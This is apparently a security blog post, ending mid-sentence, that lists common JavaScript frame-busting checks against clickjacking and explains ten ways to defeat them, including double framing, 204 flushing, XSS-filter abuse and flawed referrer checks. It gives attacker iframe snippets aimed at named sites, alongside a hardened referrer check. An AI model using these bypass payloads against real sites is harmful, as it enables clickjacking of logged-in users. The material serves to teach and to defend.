Busting Frame Busting

 
在“X-FRAME-OPTIONS”或者“浏览器防御部署”被广泛使用之前,网站防御ClickJacking的唯一方法也只能使用javascript脚本。我们把这样的javascript脚本称为-- Frame Busting,而突破“Frame Busting ”的脚本,则称为Busting Frame Busting。

Before getting into Busting Frame Busting, here is some commonly used Frame Busting code. First, the conditions that detect framing:

if (top != self)
if (top.location != self.location)
if (top.location != location)
if (parent.frames.length > 0)
if (window != top)
if (window.top !== window.self)
if (window.self != window.top)
if (parent && parent != window)
if (parent && parent.frames && parent.frames.length>0)
if((self.parent&&!(self.parent===self))&&(self.parent.frames.length!=0))

+ (one of the conditions above, combined with one of the counter-actions below)

top.location = self.location
top.location.href = document.location.href
top.location.href = self.location.href
top.location.replace(self.location)
top.location.href = window.location.href
top.location.replace(document.location)
top.location.href = "URL"
document.write()
top.location = location
top.location.replace(URL)
top.location.href = document.location
top.location.replace(window.location.href)
top.location.href = location.href
self.parent.location = document.location
parent.location.href = self.document.location
top.location.href = self.location
top.location = window.location
top.location.replace(window.location.pathname)
window.top.location = window.self.location
setTimeout(function(){document.body.innerHTML='';},1);
window.self.onload = function(evt){document.body.innerHTML='';}
var url = window.location.href; top.location.replace(url)


Now that we know some common Frame Busting code, let's look at how Busting Frame Busting is done.

Ten common Busting Frame Busting techniques

1 Double framing


Victim frame busting code:
if(top.location!=self.location){
parent.location=self.location;
}

Attacker top frame:
<iframe src="attacker2.html">

Attacker sub-frame:
<iframe src="http://www.victim.com">

2 The onBeforeUnload event

<script>
window.onbeforeunload = function() {
  return "Asking the user nicely";
}
</script>
<iframe src="http://www.paypal.com">

3 onBeforeUnload --- 204 Flushing

var prevent_bust = 0;
window.onbeforeunload = function() { prevent_bust++; };
setInterval(function() {
  if (prevent_bust > 0) {
    prevent_bust -= 2;
    // a URL that answers 204 No Content, so the navigation never completes
    window.top.location = "http://no-content-204.com";
  }
}, 1);
<iframe src="http://www.victim.com">

4 Exploiting the XSS filter

IE8:
Example. Victim frame busting code:
<script>
if(top!=self){
top.location=self.location;
}
</script>
Attacker:
<iframe src="http://www.victim.com/?v=<script>if">

Google Chrome:
Example. Victim frame busting code:
if(top!=self){
top.location=self.location;
}
Attacker:
<iframe src="http://www.victim.com/?v= if(top+!%3D+self)+%7B+top.location%3Dself.location%3B+%7D">

5 Referrer checking problems

Consider the following code from a large retailer:
if (top.location != location) {
  if (document.referrer && document.referrer.indexOf("walmart.com") == -1) {
    top.location.replace(document.location.href);
  }
}
This page can be framed by an attacker who controls a domain walmart.com.badgy.com.


6 Clobbering top.location

IE7.
Victim frame busting code:

if(top.location!=self.location){
top.location=self.location;
}
Attacker:
<script>var location="clobbered";</script>
<iframe src="http://www.victim.com">

7 IE Restricted Zone

Attacker:
<iframe src="http://www.victim.com" security="restricted"></iframe>

8 Sandbox attribute

This feature can be used to disable JavaScript in the same way as the restricted zone; however, because cookies are delivered in the subframe, clickjacking attacks can take advantage of existing sessions that the user has established.

9 Design mode


Stone [Next generation clickjacking] showed that design mode can be turned on in the framing page (via document.designMode), disabling JavaScript in both the top frame and the sub-frame. Again, cookies are delivered to the sub-frame. Design mode is currently implemented in Firefox and IE8.

10 Mobile Sites

Unfortunately, most sites that framebust on their primary domain do not framebust their mobile sites. To make matters worse, many sites do not differentiate sessions between the regular and the mobile site; that is, if you are logged in at www.example.com you are also logged in at mobile.example.com. This enables the attacker to clickjack the mobile site (on a desktop browser) and gain control of a fully functional site.


In real-world environments, Busting Frame Busting gets more complicated.

1 Facebook.com --- Shedding a Ray of Light in the Darkness

frame-busting code:

if (top != self) {
  window.document.write("<div style='" +
    "background:black;opacity:0.5;" +
    "filter:alpha(opacity=50);" +
    "position:absolute;top:0px;left:0px;" +
    "width:9999px;height:9999px;" +
    "z-index:1000001' " +
    "onClick='top.location.href=window.location.href'>" +
    "</div>");
}

Busting Frame Busting:

<body style="overflow-x:hidden; border:0px; margin:0px;">
<iframe width="21800px" height="2500px" src="http://facebook.com/" frameborder="0" marginheight="0" marginwidth="0"></iframe>
<script>window.scrollTo(10200,0);</script>


2 www.USBank.com --- Domain checking errors

frame-busting code:

if (self != top) {
  var dom = getDom(document.referrer); // site's own helper: extracts the domain from the referrer URL
  var okDom = /usbank|localhost|usbnet/;
  var matchDomain = dom.search(okDom);
  if (matchDomain == -1) { /* bust */ }
}

Sites such as www.husbanken.no and www.rusbank.org will be allowed to frame the page, since both contain the string usbank in their domain.
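Both the walmart.com check in section 5 and the USBank check above look for a substring anywhere in the referrer, which is why walmart.com.badgy.com and www.husbanken.no get through. The following is an added example, not code from the post or from either site: a referrer check that parses the URL and compares the hostname against a constructed allowlist at label boundaries, next to the two substring checks so the results can be compared.

```javascript
// Added example: hostname-anchored referrer allowlist versus the
// substring checks quoted in the post. The allowlist is constructed.
const ALLOWED_FRAMING_DOMAINS = ["walmart.com", "usbank.com"];

// Hostname of a referrer URL, lower-cased; null when the referrer is
// empty or not a valid URL. A missing referrer must not count as trusted.
function referrerHostname(referrer) {
  if (!referrer) return null;
  try {
    return new URL(referrer).hostname.toLowerCase();
  } catch (e) {
    return null;
  }
}

// A host is allowed only if it equals an allowed domain or is a
// subdomain of it (separated by a dot), so "walmart.com.badgy.com"
// does not qualify for "walmart.com".
function hostnameAllowed(host, allowed) {
  return allowed.some((d) => host === d || host.endsWith("." + d));
}

// Framing decision: bust out unless the referrer hostname is allowlisted.
function shouldFrameBust(referrer, allowed = ALLOWED_FRAMING_DOMAINS) {
  const host = referrerHostname(referrer);
  return host === null || !hostnameAllowed(host, allowed);
}

// The two checks from the post, reproduced only to show what they accept.
function walmartSubstringCheckAllows(referrer) {
  return referrer.indexOf("walmart.com") !== -1;
}
function usbankRegexCheckAllows(domain) {
  return domain.search(/usbank|localhost|usbnet/) !== -1;
}

// Constructed referrers: one legitimate, then the bypass hosts from the post.
const SAMPLE_REFERRERS = [
  "https://www.walmart.com/cart",
  "http://walmart.com.badgy.com/",
  "http://www.husbanken.no/",
  "http://www.rusbank.org/",
];
for (const r of SAMPLE_REFERRERS) {
  console.log(r, "-> bust:", shouldFrameBust(r));
}
```

The referrer can be empty (privacy settings, HTTPS to HTTP) or spoofed by a framing page that controls its own URL, so this only hardens the string check; the header-based defense from the introduction is still the reliable one.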


3 Myspace.com --- Trust problems

frame-busting code:

try {
  A = !top.location.href
} catch (B) {}
A = A && !(document.referrer.match(
      /^https?:\/\/[-a-z0-9.]*\.google\.(co\.|com\.)?[a-z]+\/imgres/i))
  && !(document.referrer.match(
      /^https?:\/\/([^\/]*\.)?(myspace\.com|myspace\.cn|simsidekick\.com|levisawards\.com)\//i));
if (A) { /* framebust */ }

By design the code allows Myspace to be framed by Google Images. Google Images, however, does not use frame busting.

An attacker can frame Google Images and then cause Google Images to frame Myspace (e.g. by issuing a specific Google search query that leads to a Myspace page).


Both how to defend and how to break through have been shown in the descriptions above. What follows is currently the most protective